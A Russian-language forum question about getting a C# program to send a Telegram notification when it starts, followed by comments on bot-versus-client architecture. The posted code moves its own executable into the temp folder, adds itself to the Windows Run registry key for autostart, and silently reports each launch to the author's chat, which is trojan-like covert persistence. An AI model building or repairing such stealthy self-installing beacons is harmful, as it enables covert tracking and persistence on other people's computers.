# Как привязать телеграм бота к программе на C#?

Tags: c#

Есть программа. Нужно, чтобы при запуске мне приходило оповещение в телеграм бот. Бота написал на питоне, запустил его на сервере. При запуске программы сообщения не приходят. Подскажите, пожалуйста, что я делаю неправильно. Заранее благодарю!

```
using System;
using System.Diagnostics;
using System.IO;
using System.Threading.Tasks;
using Microsoft.Win32;
using Telegram.Bot;

class Program
{

    static async Task SendTelegramMessage(string message)
    {
        string botToken = "token";
        long chatId = id;

        TelegramBotClient botClient = new TelegramBotClient(botToken);
        await botClient.SendTextMessageAsync(chatId, message);
    }

    static async Task Main()
    {
        string desktopPath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
        string exePath = Process.GetCurrentProcess().MainModule.FileName;

        string tempPath = Path.Combine(Path.GetTempPath(), "myprogram.exe");
        File.Move(exePath, tempPath);

        await SendTelegramMessage("Кто-то запустил программу");

        AddToStartup(tempPath);

        Environment.Exit(0);
    }

    static void AddToStartup(string programPath)
    {
        using (RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true))
        {
            key.SetValue("MyProgram", programPath);
        }
    }
}
```

Comment: Есть клиент, есть сервер, где последний запускается один раз и что-то слушает, что-то делает. А клиентов много, они подключаются к серверу и что-то ему отправляют. Вот телеграмм имеет также, клиентов и сервер, когда вы запускаете приложение - вы клиент, подключаемый к серверу телеграмм, к самому серверу у вас доступа нету. Ну а бот - это по сути, прослойка, которая подключается к серверу и общается с ним, а не с клиентами. К чему это я... Вы написали бота, он читает чат, ок, но в этот чат должны писать **клиенты**, а не другие боты. А автоматизация клиентов ни как не связана с ботами и это бан

Comment: @EvgeniyZ  Боты же тоже могут писать в чаты? Или я не понял посыл

Comment: @tym32167 Да, только как я понял задумку автора, он хочет запускать "бота" на стороне **каждого** клиента (создать приложение в котором будет зашит ключ конкретного бота, и которое будет следить за запуском определенного процесса, после чего отсылать эту информацию в чат), что крайне странно, да и подобное запрещено, будет давать ошибку [409](https://telegrambots.github.io/book/FAQ.html#i-got-a-409-error-what-do-i-do). По моему мнению, автор не понимает что такое "бот" и что такое "клиент", что я и попытался объяснить выше.

Comment: @EvgeniyZ а, я понял, автор пытается спавнить одного и того же бота на клиентах, когда бот - это фишка бекендов и телеграм не ожидает 100500 подключений от одного и того же бота. По хорошему тут надо иметь свой бекенд со встроенным ботом, и чтобы прога при запуске пинговала бек, который уже через бота вышлет сообщение